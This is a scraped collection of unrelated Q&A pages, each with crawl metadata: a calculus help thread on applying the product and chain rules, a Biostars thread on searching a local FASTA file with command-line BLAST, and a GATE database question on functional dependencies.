The last step comes from $I (x_1,x_2)^T + \pmatrix{5 & -2 \\ -3 & -1} (x_3,x_4)^T = 0$, which shows that when you select $x_3,x_4$, $x_1,x_2$ are completely defined. – copper.hat Nov 7 '12 at 7:31 | 2016-02-14 08:14:43 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.815523624420166, "perplexity": 182.3910344976636}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2016-07/segments/1454701171770.2/warc/CC-MAIN-20160205193931-00028-ip-10-236-182-209.ec2.internal.warc.gz"} |
https://www.physicsforums.com/threads/problem-in-applying-the-chain-rule.950712/ | Problem in applying the Chain Rule
Gold Member
Homework Statement
I am facing problem in applying the chain rule.
The question which I am trying to solve is,
" Find the second derivative of
"
The Attempt at a Solution
So, I differentiated it the first time,
$\frac{dy}{dt} = t\,(t^2+1)^{-\frac{1}{2}}$ [BY CHAIN RULE]
And now to find the second derivative I differentiated it once again,
so,
=>
But this is a wrong answer.
Please tell me where am I doing the mistake in applying the chain rule?
I will be thankful for help!
fresh_42
Mentor
You differentiated $\dfrac{d}{dx}(fg)$ to $\dfrac{d}{dx}(f)\cdot \dfrac{d}{dx}(g)$ which it is not, and it is not the chain rule.
Do you know the chain rule? I would have expected this information under point 2. of the template.
Ray Vickson
Homework Helper
Dearly Missed
To get $d^2y/dt^2$ you need to apply the product rule to $dy/dt$. That will produce two terms, not one, although you can then simplify it down to one term again.
Please do NOT attach images; it makes it difficult to cite results and sub-results. Since you already used some kind of package to format your formulas, why not type them in here directly, using LaTeX?
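Taking $y=\sqrt{t^2+1}$, which is what the replies imply the missing attachment contained, the product-plus-chain-rule result $\frac{d^2y}{dt^2}=(t^2+1)^{-3/2}$ can be sanity-checked numerically with a central difference:

```python
import math

def y(t):
    return math.sqrt(t * t + 1)   # the function implied by the replies

t, h = 1.0, 1e-4
numeric = (y(t + h) - 2 * y(t) + y(t - h)) / (h * h)   # central difference
exact = (t * t + 1) ** -1.5
print(abs(numeric - exact) < 1e-6)   # True
```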
Delta2
Homework Helper
Gold Member
Your mistake is not in the application of the chain rule but you don't seem to apply correctly the product rule. You have find $\frac{dy}{dt}$ as product of $t$ and $(t^2+1)^{-\frac{1}{2}}$. So to calculate the derivative of that product first apply correctly the product rule $\frac{d(fg)}{dt}=\frac{df}{dt}g+f\frac{dg}{dt}$ for $f(t)=t$ and $g(t)=(t^2+1)^{-\frac{1}{2}}$and then apply the chain rule to calculate correctly $\frac{dg}{dt}$. | 2020-04-02 20:07:59 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8054577708244324, "perplexity": 1094.6252890077826}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-16/segments/1585370507738.45/warc/CC-MAIN-20200402173940-20200402203940-00288.warc.gz"} |
https://www.biostars.org/p/250341/#250356 | Use BLAST's search on your own FASTA?
5.8 years ago
orlando.wong ▴ 60
Hello biostars,
I have a FASTA file of about 300 kbp & I have several sequences (400 bp - 800 bp) that I want to search in there.
I tried using BLAST, but I couldn't find the option to allow me to upload my own FASTA file in the Search Set box.
The EMBOSS water tool stops and lists only the first hit, but the sequences occur multiple times throughout the FASTA file.
Does anyone have any other software or other ideas? Thank you!
5.8 years ago
Ram 38k
You can use the command line version of blast+ to create a database out of your sequences (using makeblastdb) and then blast your query sequence against this database. It is not possible to do what you want on the web.
5.8 years ago
biofalconch ▴ 560
Ok, what I make of that tool is that it is used to just align TWO sequences, so naturally it just ignores the rest. Adding to @Ram 's answer, you want to create a database for your fasta using makeblastdb (is as easy as makeblastdb -in file.fa -dbtype nucl -out database), once you have your database set, you can go on and run blastn (blastn -query file.fa -db database -out file.out -outfmt 6). Now, it depends on how you want your output (option -outfmt), I recommend reading more. This will give you a text output that can be more easily searched than using webtools. Hope it helps :)
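Since -outfmt 6 is plain tab-separated text, the hits are also easy to post-process programmatically. A small sketch follows; the column names are BLAST+'s default 12-column layout, and the example hit line is made up:

```python
# Default 12 columns of BLAST+ tabular output (-outfmt 6).
COLS = ["qseqid", "sseqid", "pident", "length", "mismatch", "gapopen",
        "qstart", "qend", "sstart", "send", "evalue", "bitscore"]

def parse_blast6(lines):
    """Yield one dict per hit line of a -outfmt 6 file."""
    for line in lines:
        if line.strip():
            yield dict(zip(COLS, line.rstrip("\n").split("\t")))

# Hypothetical hit line for illustration.
example = "query1\tcontig3\t98.750\t800\t10\t0\t1\t800\t5021\t5820\t0.0\t1420"
hit = next(parse_blast6([example]))
print(hit["sseqid"], float(hit["pident"]))   # contig3 98.75
```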
Thanks so much for the BLAST command line commands. Was able to run it blazing fast in less than 0.5 seconds! | 2023-02-08 20:32:53 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.1746707707643509, "perplexity": 3900.1306443962035}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764500904.44/warc/CC-MAIN-20230208191211-20230208221211-00278.warc.gz"} |
https://proxies123.com/tag/module/ | ## cryptography – Diffie-Hellman with non-main module
When using the Diffie-Hellman key exchange, it is said to be important to use a safe prime as the modulus. However, if a non-prime modulus with a sufficient bit length is generated, is there an attack that can recover the shared secret from the public communication (g, g^a, g^b, modulus), or decrypt an encrypted message?
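Not a substitute for a proper cryptographic answer, but a toy sketch of the danger: with a weak modulus, an eavesdropper who sees only (g, g^a, g^b, n) can solve the discrete log and recover the shared secret. All parameters below are deliberately tiny and made up; the Pohlig-Hellman algorithm scales the same idea to any group whose order factors into small primes, a typical risk for carelessly chosen composite moduli.

```python
n = 101 * 103            # tiny composite modulus (toy parameters)
g = 7
a_secret, b_secret = 1234, 4321
A = pow(g, a_secret, n)  # public values exchanged in the clear
B = pow(g, b_secret, n)

# Eavesdropper: brute-force some x with g^x = A (mod n)...
acc, x = 1, 0
while acc != A:
    acc = (acc * g) % n
    x += 1
# ...then B^x equals the shared secret, even though x may differ
# from a_secret (they agree modulo the order of g).
print(pow(B, x, n) == pow(A, b_secret, n))   # True
```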
## linux – Error flooding is related to the alx module
My Linux box is flooded with the following error at a very high rate, which makes journald consume a lot of CPU and causes the CPU fan to spin up. Interestingly, the network still works. The Internet is not much help; I only found some irrelevant articles that date back at least several kernel versions. Any ideas about what is happening?
Apr 20 13:18:09 ###.#####.net kernel: alx 0000:08:00.0 eth0: fatal interrupt 0x4019607, restart
Apr 20 13:18:09 ###.#####.net kernel: alx 0000:08:00.0 eth0: fatal interrupt 0x4019607, restart
Apr 20 13:18:09 ###.#####.net kernel: alx 0000:08:00.0 eth0: fatal interrupt 0x4019607, restart
Here is the information of my box:
cat /etc/os-release
NAME="openSUSE Leap"
VERSION="42.3"
uname -a
Linux ###.######.net 4.4.176-96-default #1 SMP Fri Mar 22 06:23:26 UTC 2019 (a0dd1b8) x86_64 x86_64 x86_64 GNU/Linux
lspci | grep -i ethernet
08:00.0 Ethernet controller: Qualcomm Atheros Killer E220x Gigabit Ethernet Controller (rev 10)
modinfo alx
filename: /lib/modules/4.4.176-96-default/kernel/drivers/net/ethernet/atheros/alx/alx.ko
description: Qualcomm Atheros(R) AR816x/AR817x PCI-E Ethernet Network Driver
author: Qualcomm Corporation,
author: Johannes Berg
alias: pci:v00001969d000010A0sv*sd*bc*sc*i*
alias: pci:v00001969d000010A1sv*sd*bc*sc*i*
alias: pci:v00001969d00001090sv*sd*bc*sc*i*
alias: pci:v00001969d0000E0A1sv*sd*bc*sc*i*
alias: pci:v00001969d0000E091sv*sd*bc*sc*i*
alias: pci:v00001969d00001091sv*sd*bc*sc*i*
depends: mdio
retpoline: Y
intree: Y
## Powershell module, Posh-SSH: How is the sequence reading supposed to work in Posh-SSH?
I am trying to understand how stream reading is supposed to work in Posh-SSH, so that I can put together a "wait" function that lets the script continue only after the remote command has completed.
The intent of the code shown below is to initiate a "yum update" on the remote system (Linux, CentOS 7), then monitor the stream to determine when the remote command has completed, and then move on to the next line of the script. It works "sometimes", but not always.
This code successfully configures a new SSH connection and defines a shell stream:
``````$hostIP = "Remote_Linux_Server_IP"
$centosCreds = "My_Credential_Object"
$pemFile = "My_Pem_File"
New-SSHSession -ComputerName $hostIP -Port 22 -Credential $centosCreds -KeyFile $pemFile -ConnectionTimeout 120 -OperationTimeout 120 -AcceptKey
$stream = New-SSHShellStream -Index 0
``````
Executing a remote command through the new stream is quite easy:
``````Invoke-SSHStreamShellCommand -ShellStream $stream -Command "yum update"
``````
Running the following while the Invoke-SSHStreamShellCommand ("yum update") is still executing returns a fragment of the remote command output, as expected:
``````$stream.Read()
``````
However, once the "yum update" is complete, reading the stream returns only a blank value. The information I could find online indicates that reading the stream should return the remote system's command-prompt string, but this does not seem to be the case.
Because the value returned by the read after the command has completed is blank, the "wait" loop that I am trying to assemble does not work consistently:
``````$promptString = "Regex_Matching_Remote_System_Command_Prompt"
$streamOut = $stream.Read()
while ($streamOut -notlike "$promptString") {
    Start-Sleep -s 1
    $streamOut = $stream.Read()
}
``````
I'm not sure what I'm missing here: the documentation is limited and I have not been able to find many other examples of continuous Posh-SSH readings that match the behavior I'm seeing.
Any guidance or suggestion is appreciated.
Thank you.
## theme – Pass the custom module variable to the twig template
How can I pass a variable from my custom module to a twig field template?
My field template is "field – node – field – webform – show – visit.html.twig"
and my module is called "custommodule"
I tried this function according to the documentation but apparently I did not understand something correctly:
``````function logintosubmit_preprocess_field_node_field_webform_parliament_visit(array &$variables) {
  $VARIABLE_NAME = 'my_variable';
  $variables['varname'] = $VARIABLE_NAME;
}
``````
## javascript – Division without using division, multiplication or module operators
Homework
Implement the division of two positive integers without using the division, multiplication, or modulo operators. Return the quotient as an integer, ignoring the remainder.
My solution
``````const divide = (dividend, divisor) => {
  // Determine the sign of the quotient without multiplying.
  const negative = (dividend > 0 && divisor < 0) ||
                   (dividend < 0 && divisor > 0);
  let tempdividend = Math.abs(dividend);
  const tempdivisor = Math.abs(divisor);
  let quotient = 0;
  // Subtract the largest left-shifted copy of the divisor that
  // still fits into what remains of the dividend.
  while (tempdividend >= tempdivisor) {
    let shifted = tempdivisor;
    let multiple = 1;
    while ((shifted << 1) <= tempdividend) {
      shifted <<= 1;
      multiple <<= 1;
    }
    tempdividend -= shifted;
    quotient += multiple;
  }
  return negative ? -quotient : quotient;
};
``````
## module – Magento 1.9 adds custom field to multiple templates
I have a custom field that I would like to add to all areas in the admin panel where you can change the quantity of a product. I currently have the impression that I have to rewrite each template individually.
For example, to add the field to the inventory tab in the editing product, I made a rewrite of the template as follows:
Config.xml
``````
``````
Inventory.php
``````        getAttribute(Mage_Catalog_Model_Product::ENTITY, 'stock_reason');
        if ($attribute->usesSource()) {
            $options = $attribute->getSource()->getAllOptions(true);
        }
        return $options;
    }

    public function __construct()
    {
        parent::__construct();
        $this->setTemplate('vish/catalog/product/tab/inventory.phtml');
    }
}
``````
I think that, consequently, I would do the same for the attribute update action. This seems redundant and repetitive, so I wanted to ask whether I am doing this correctly. Or does Magento have a better way?
## magento2 – Magento 2: How to move an existing module from the vendor folder to the app folder?
I want to move a module called "payment module" from the vendor folder to the app folder. But every time I try to register the module in app, an error appears saying that the module "already exists in the vendor folder". How can I register this module in the app folder? Can anybody help me, please?
## Arithmetic geometry – Towers of moduli spaces in Scholze's theory
My question is related to another one that I read here on Overflow. I'm reading Scholze's articles on moduli of $p$-divisible groups and elliptic curves, and I'm very interested in the formal geometry involved there. In fact, I noticed that there is an article by Andreatta, Iovita and Pilloni, entitled Le halo spectral, which seems to deal with formal integral models of the Scholze towers.
First, if I understand Scholze correctly, in the case of elliptic curves there is a perfectoid space $\mathcal{X}_{\infty}(\epsilon)$ which is the "tilde limit" of the modular curves $\mathcal{X}_{\Gamma(p^n)}(\epsilon)$, where each $\mathcal{X}_{\Gamma(p^n)}(\epsilon)$ describes an open neighborhood of the ordinary locus of the $\Gamma_1(N)$ modular curve, on which the universal elliptic curve obtained by pullback is not too supersingular. In fact, this object is constructed by taking the adic generic fiber of the formal scheme $\mathfrak{X}_{\infty}(\epsilon)$, which is the actual limit (in the category of formal schemes) of the integral models of $\mathcal{X}_{\Gamma(p^n)}(\epsilon)$, where the maps in the inverse system are given by a lift of the mod-$p$ Frobenius.
A very similar construction is carried out in Chapter 6 of the paper of Andreatta, Iovita and Pilloni, where they build the anticanonical integral tower $\mathfrak{X}_{\infty}$ in exactly the same way, but working over a base that is a suitable blow-up of an integral model of Coleman's weight space. Now, I wonder whether it is possible to interpret these "infinite-level" spaces as moduli spaces of elliptic curves with a new kind of level structure. Somewhere in Scholze's article it is mentioned that a point of $\mathcal{X}_{\infty}$ over $\mathrm{Spa}(C, \mathcal{O}_C)$, where $C$ is a complete algebraically closed extension of $\mathbb{Q}_p$, corresponds to an elliptic curve over $C$ together with a trivialization of its Tate module. Now, why is this true? It is not spelled out in Scholze and I cannot prove it. Moreover, does a similar description hold for other kinds of points, e.g. $\mathrm{Spa}(R, R^+)$ with $R$ a perfectoid $\mathbb{Q}_p$-algebra? Also, does the same interpretation hold for its formal integral model? And what about the tower of Andreatta, Iovita and Pilloni? Is it true that it parametrizes elliptic curves with $p$-divisible groups playing the role of the canonical subgroup? The point is essentially: does this object pull back a universal elliptic curve? What kind of level structure does such an elliptic curve carry?
https://stats.stackexchange.com/questions/191810/repeated-measures-random-effects-for-logistic-regression-in-r | # Repeated measures - random effects for logistic regression in R?
## Study design
504 individuals were each sampled twice: once before and once after a celebration.
The goal is to investigate if this event (Celebration) as well as working with animals (sheepdog) have an influence on the probability that an individual gets infected by a parasite. (out of 1008 observations only 22 are found to be infected)
Variables
• dependent variable = "T_hydat" (infected or not)
(most predictor variables are categorical)
• "Celebration" (yes/no)
• "sex" (m/f)
• "RelAge" (5 levels)
• "SheepDog" (yes/no)
• "Area" (geographical area = 4 levels)
• "InfectionPeriodT_hydat" (continuous --> number of days after deworming)
• "Urbanisation" (3 levels)
## Question 1:
1) Should I include Individual-ID ("ID") as a random effect, as I sampled each individual 2 times? (Pseudoreplication?)
mod_fail <- glmer( T_hydat ~ Celebration + Sex + RelAge + SheepDog + InfectionPeriodT_hydat + Urbanisation + (1|ID), family = binomial)
Warnings:
1: In (function (fn, par, lower = rep.int(-Inf, n), upper = rep.int(Inf, :
failure to converge in 10000 evaluations
2: In checkConv(attr(opt, "derivs"), opt$par, ctrl = control$checkConv, :
Model failed to converge with max|grad| = 1.10808 (tol = 0.001, component 10)
3: In checkConv(attr(opt, "derivs"), opt$par, ctrl = control$checkConv, :
Model is nearly unidentifiable: large eigenvalue ratio
- Rescale variables?
--> unfortunately this model fails to converge (is it a problem that ID has 504 levels with only 2 observations per level?). Convergence is achieved with glmmPQL(), but after dropping some insignificant predictor variables the model fails to converge again. What is the problem here? Could geeglm() be a solution?
In another attempt I ran the model with only "Area" (4 levels) as a random effect (my expectation is that individuals in the same geographical area suffer from the same parasite pressure etc.) and received the following p-values.
## My model in R:
mod_converges <- glmer( T_hydat ~ Celebration + Sex + RelAge + SheepDog + InfectionPeriodT_hydat + Urbanisation + (1|Area), family = binomial)
## mod_converges output:
summary(mod_converges)
Generalized linear mixed model fit by maximum likelihood (Laplace Approximation) ['glmerMod']
Family: binomial ( logit )
Formula: T_hydat ~ Celebration + sex + SheepDog + RelAge + Urbanisation +
InfectionPeriodT_hydat + (1 | Area)
Data: dat
AIC BIC logLik deviance df.resid
203.0 262.0 -89.5 179.0 996
Scaled residuals:
Min 1Q Median 3Q Max
-0.461 -0.146 -0.088 -0.060 31.174
Random effects:
Groups Name Variance Std.Dev.
Area (Intercept) 0.314 0.561
Number of obs: 1008, groups: Area, 4
Fixed effects:
Estimate Std. Error z value Pr(>|z|)
(Intercept) -6.81086 1.96027 -3.47 0.00051 ***
Celebration1 1.36304 0.57049 2.39 0.01688 *
sexm -0.18064 0.49073 -0.37 0.71279
SheepDog1 2.02983 0.51232 3.96 7.4e-05 ***
RelAge2 0.34815 1.18557 0.29 0.76902
RelAge3 0.86344 1.05729 0.82 0.41412
RelAge4 -0.54501 1.43815 -0.38 0.70471
RelAge5 0.85741 1.25895 0.68 0.49584
UrbanisationU 0.17939 0.78669 0.23 0.81962
UrbanisationV 0.01237 0.59374 0.02 0.98338
InfectionPeriodT_hydat 0.00324 0.01159 0.28 0.77985
---
Signif. codes: 0 ‘***’ 0.001 ‘**’ 0.01 ‘*’ 0.05 ‘.’ 0.1 ‘ ’ 1
This model converges with "Sample_ID" as a random effect; however, as stated by usεr11852, the variance of the random effect is quite high: 4.095497^2 = 16.8. And the std. error of Area5 is far too high (complete separation). Can I just remove data points from Area5 to overcome this problem?
# T_hydat
# Area 0 1
# 1 226 4
# 2 203 3
# 4 389 15
# 5 168 0 ## here is the problematic cell
Linear mixed-effects model fit by maximum likelihood
Data: dat
AIC BIC logLik
NA NA NA
Random effects:
Formula: ~1 | Sample_ID
(Intercept) Residual
StdDev: 4.095497 0.1588054
Variance function:
Structure: fixed weights
Formula: ~invwt
Fixed effects: T_hydat ~ Celebration + sex + SheepDog + YoungOld + Urbanisation + InfectionPeriodT_hydat + Area
Value Std.Error DF t-value p-value
(Intercept) -20.271630 1.888 502 -10.735869 0.0000
Celebration1 5.245428 0.285 502 18.381586 0.0000
sexm -0.102451 0.877 495 -0.116865 0.9070
SheepDog1 3.356856 0.879 495 3.817931 0.0002
YoungOldyoung 0.694322 1.050 495 0.661017 0.5089
UrbanisationU 0.660842 1.374 495 0.480990 0.6307
UrbanisationV 0.494653 1.050 495 0.470915 0.6379
InfectionPeriodT_hydat 0.059830 0.007 502 8.587736 0.0000
Area2 -1.187005 1.273 495 -0.932576 0.3515
Area4 -0.700612 0.973 495 -0.720133 0.4718
Area5 -23.436977 28791.059 495 -0.000814 0.9994
Correlation:
(Intr) Clbrt1 sexm ShpDg1 YngOld UrbnsU UrbnsV InfPT_ Area2 Area4
Celebration1 -0.467
sexm -0.355 0.018
SheepDog1 -0.427 0.079 0.066
YoungOldyoung -0.483 0.017 0.134 0.045
UrbanisationU -0.273 0.005 -0.058 0.317 -0.035
UrbanisationV -0.393 0.001 -0.138 0.417 -0.087 0.586
InfectionPeriodT_hydat -0.517 0.804 0.022 0.088 0.016 0.007 0.003
Area2 -0.044 -0.035 -0.044 -0.268 -0.070 -0.315 -0.232 -0.042
Area4 -0.213 -0.116 -0.049 -0.186 -0.023 -0.119 0.031 -0.148 0.561
Area5 0.000 0.000 0.000 0.000 0.000 0.000 0.000 0.000 0.000 0.000
Standardized Within-Group Residuals:
Min Q1 Med Q3 Max
-14.208465914 -0.093224405 -0.022551663 -0.004948562 14.733133744
Number of Observations: 1008
Number of Groups: 504
Output from logistf (Firth's penalized-likelihood logistic regression)
logistf(formula = T_hydat ~ Celebration + sex + SheepDog + YoungOld +
Urbanisation + InfectionPeriodT_hydat + Area, data = dat,
family = binomial)
Model fitted by Penalized ML
Confidence intervals and p-values by Profile Likelihood
coef se(coef) lower 0.95 upper 0.95 Chisq
(Intercept) -5.252164846 1.52982941 -8.75175093 -2.24379091 12.84909207
Celebration1 1.136833737 0.49697927 0.14999782 2.27716500 5.17197661
sexm -0.200450540 0.44458464 -1.09803320 0.77892986 0.17662930
SheepDog1 2.059166246 0.47197694 1.10933774 3.12225212 18.92002321
YoungOldyoung 0.412641416 0.56705186 -0.66182554 1.77541644 0.50507269
UrbanisationU 0.565030324 0.70697218 -0.98974390 1.97489240 0.56236485
UrbanisationV 0.265401035 0.50810444 -0.75429596 1.33772658 0.25619218
InfectionPeriodT_hydat -0.003590666 0.01071497 -0.02530179 0.02075254 0.09198425
Area2 -0.634761551 0.74958750 -2.27274031 0.90086554 0.66405078
Area4 0.359032194 0.57158464 -0.76903324 1.63297249 0.37094569
Area5 -2.456953373 1.44578029 -7.36654837 -0.13140806 4.37267766
p
(Intercept) 3.376430e-04
Celebration1 2.295408e-02
sexm 6.742861e-01
SheepDog1 1.363144e-05
YoungOldyoung 4.772797e-01
UrbanisationU 4.533090e-01
UrbanisationV 6.127483e-01
InfectionPeriodT_hydat 7.616696e-01
Area2 4.151335e-01
Area4 5.424892e-01
Area5 3.651956e-02
Likelihood ratio test=36.56853 on 10 df, p=6.718946e-05, n=1008
Wald test = 32.34071 on 10 df, p = 0.0003512978
**glmer Model (Edited 28th Jan 2016)**
Output from glmer2var: mixed-effects model with the 2 most "important" variables ("Celebration" = the factor I am interested in, and "SheepDog", which was found to have a significant influence on infection when data before and after the celebration were analysed separately). The small number of positives makes it impossible to fit a model with more than two explanatory variables (see comment by EdM).
There seems to be a strong effect of "Celebration" that probably cancels out the effect of "SheepDog" found in previous analysis.
Generalized linear mixed model fit by maximum likelihood (Laplace Approximation) ['glmerMod']
Family: binomial ( logit )
Formula: T_hydat ~ Celebration + SheepDog + (1 | Sample_ID)
Data: dat
AIC BIC logLik deviance df.resid
113.0 132.6 -52.5 105.0 1004
Scaled residuals:
Min 1Q Median 3Q Max
-4.5709 -0.0022 -0.0001 0.0000 10.3491
Random effects:
Groups Name Variance Std.Dev.
Sample_ID (Intercept) 377.1 19.42
Number of obs: 1008, groups: Sample_ID, 504
Fixed effects:
Estimate Std. Error z value Pr(>|z|)
(Intercept) -19.896 4.525 -4.397 1.1e-05 ***
Celebration1 7.626 2.932 2.601 0.00929 **
SheepDog1 1.885 2.099 0.898 0.36919
---
Signif. codes: 0 ‘***’ 0.001 ‘**’ 0.01 ‘*’ 0.05 ‘.’ 0.1 ‘ ’ 1
Correlation of Fixed Effects:
(Intr) Clbrt1
Celebratin1 -0.908
SheepDog1 -0.297 -0.023
## Question 2:
2) Can I use drop1() to get the final model and use the p-values from summary(mod_converges) for interpretation? Does my output tell me whether it makes sense to include the random effect ("Area")?
Generalized linear mixed model fit by maximum likelihood (Laplace Approximation) ['glmerMod']
Family: binomial ( logit )
Formula: T_hydat ~ Celebration + SheepDog + (1 | Area)
Data: dat
AIC BIC logLik deviance df.resid
190.8 210.4 -91.4 182.8 1004
Scaled residuals:
Min 1Q Median 3Q Max
-0.369 -0.135 -0.096 -0.071 17.438
Random effects:
Groups Name Variance Std.Dev.
Area (Intercept) 0.359 0.599
Number of obs: 1008, groups: Area, 4
Fixed effects:
Estimate Std. Error z value Pr(>|z|)
(Intercept) -5.912 0.698 -8.47 < 2e-16 ***
Celebration1 1.287 0.512 2.51 0.012 *
SheepDog1 2.014 0.484 4.16 3.2e-05 ***
---
Signif. codes: 0 ‘***’ 0.001 ‘**’ 0.01 ‘*’ 0.05 ‘.’ 0.1 ‘ ’ 1
Correlation of Fixed Effects:
(Intr) Clbrt1
Celebratin1 -0.580
SheepDog1 -0.504 0.027
I know there are quite a few questions but I would really appreciate some advice from experienced people. Thanks!
• With only 22 observations showing an infection, you shouldn't be trying to fit more than 1 or 2 predictor variables (degrees of freedom). See this page, for example. – EdM Jan 26 '16 at 18:31
• Can you include the output from your original model? Specification-wise, it makes the most sense to me, though it may be over-parametrized if you only have 22 positive observations. You might try fitting it with the package blme, which adds some regularization to the fixed and/or random effects, and can help with issues of parameters being forced to the boundaries of the parameter space (both linear separation and zero-variance random effects). – Andrew M Jan 26 '16 at 18:44
• @EdM, thanks for this advice. So I seem to be restricted in analyzing this data and can only make the best out of it. If I run the model with the 2 variables "Celebration" and "SheepDog" (the variables I suspect to be the most important), the model converges and the output seems reasonable to me (output added (glmer2var)). Would you agree with that procedure? – organutan Jan 28 '16 at 13:22
• @AndrewM, I don't exactly understand what you mean by "original model". Are you talking about the mixed model with ID as a random effect, which didn't converge? – organutan Jan 28 '16 at 13:23
• You don't want to lose the information about the paired comparisons. Also, it seems that you want to focus on the effects of the celebration. How many individuals were infected before the celebration? Did any of those lose the infection after the celebration? – EdM Jan 28 '16 at 14:26
I think that your original model with 504 levels, each level having two readings, is problematic because it potentially suffers from complete separation, especially given the small number of positives in your sample. By complete separation I mean that for a given combination of covariates all responses are the same (usually 0 or 1). You might want to try a different optimizer (i.e. something along the lines of glmerControl(optimizer='bobyqa','Nelder_Mead', etc., ...)), but I would not be very confident that this would work either. In general, having some levels with one or two observations is not a problem, but when all of them are so low things become computationally odd because you start having identifiability issues (e.g. you definitely cannot evaluate any slopes, as a random slope plus a random intercept for every individual would give you one random effect for every observation). You really lose a lot of degrees of freedom any way you count them. You do not show the glmmPQL output, but I suspect a very high variance of the random effect, which would strongly suggest that there is complete separation. (EDIT: You now show that output, and you can clearly see that the ratio is indeed very high.) You might want to consider using the function logistf from the package with the same name. logistf will fit a penalized logistic regression model that will probably alleviate the issue you experience; it will not use any random effects.
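The mechanism behind complete separation can be illustrated with a toy calculation (my own sketch, not part of the original answer; the data are invented): when one cell of a categorical predictor contains no positives, the log-likelihood keeps improving as that cell's coefficient heads to minus infinity, so the maximum-likelihood estimate diverges and the reported variances and standard errors blow up.

```javascript
// y: binary outcomes; x: indicator of a cell with no positives
// (like Area 5 in the question's contingency table).
const y = [1, 0, 1, 0, 0, 0];
const x = [0, 0, 0, 1, 1, 1];

// Bernoulli log-likelihood of a logistic model with intercept b0
// and coefficient b1 on the indicator x.
const loglik = (b0, b1) =>
  y.reduce((ll, yi, i) => {
    const p = 1 / (1 + Math.exp(-(b0 + b1 * x[i])));
    return ll + (yi ? Math.log(p) : Math.log(1 - p));
  }, 0);

// Holding the intercept fixed, the fit keeps improving as b1 -> -Inf:
console.log(loglik(0.69, -5) < loglik(0.69, -10));   // true
console.log(loglik(0.69, -10) < loglik(0.69, -20));  // true
```

Penalization (logistf, blme) works precisely by adding a term that stops this drift to infinity.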
The rule of thumb for the lowest number of levels with which a random effect can be estimated reasonably is "5 or 6"; below that, your estimate of the standard deviation of that effect will really suffer. With this in mind, no: using Area, which has just four (4) levels, is too aggressive. It probably makes more sense to use it as a fixed effect. In general, if I do not have at least 10-11 levels I am a bit worried about the validity of the random-effects assumption; we are estimating a Gaussian, after all.
Yes, you could use drop1, but be really careful not to start data-dredging (which is a bad thing). Take any variable-selection procedure with a grain of salt. This issue is extensively discussed on Cross Validated; e.g. see the following two great threads for starters: here and here. Maybe it is more reasonable to include certain "insignificant" variables in a model so one can control for them, and then comment on why they came out insignificant, rather than just stripping a model down to the absolute bare bones where everything is uber-significant. In any case I would strongly suggest using the bootstrap to get confidence intervals for the estimated parameters.
• I am glad I could help. Just to clarify, logistf will not include a random effect. All effects will be fixed in that sense. (I will add this clarification to the original answer). – usεr11852 Jan 26 '16 at 18:18
• @AndrewM: I see your point and it is not ungrounded, but in the current case I think that consistently two measurements per subject do not warrant a full mixed model. You need to regularize something; using logistf does this. Your comment about using blme is just another way of doing this regularization, especially given the small # of positives. Look at the ratio of variances in the glmmPQL output: 600+? In that sense maybe using rare-event logistic regression, relogit from Zelig, is relevant too. (That's why the complete separation comment.) – usεr11852 Jan 26 '16 at 19:09
https://gateoverflow.in/855/gate2002-2-25 | 1.5k views
From the following instance of a relation schema $R(A,B,C)$, we can conclude that:
| $A$ | $B$ | $C$ |
|---|---|---|
| $1$ | $1$ | $1$ |
| $1$ | $1$ | $0$ |
| $2$ | $3$ | $2$ |
| $2$ | $3$ | $2$ |
1. $A$ functionally determines $B$ and $B$ functionally determines $C$
2. $A$ functionally determines $B$ and $B$ does not functionally determine $C$
3. $B$ does not functionally determine $C$
4. $A$ does not functionally determine $B$ and $B$ does not functionally determine $C$
"From the following instance of a relation schema R(A,B,C)"
Relation = one table
Instance = values at one moment ( as opposed to the schema, which is the description of all possible values)
Ans. $C$
Generally, normalization is done on the schema itself.
From the given relational instance, we may strike out FDs that do not hold.
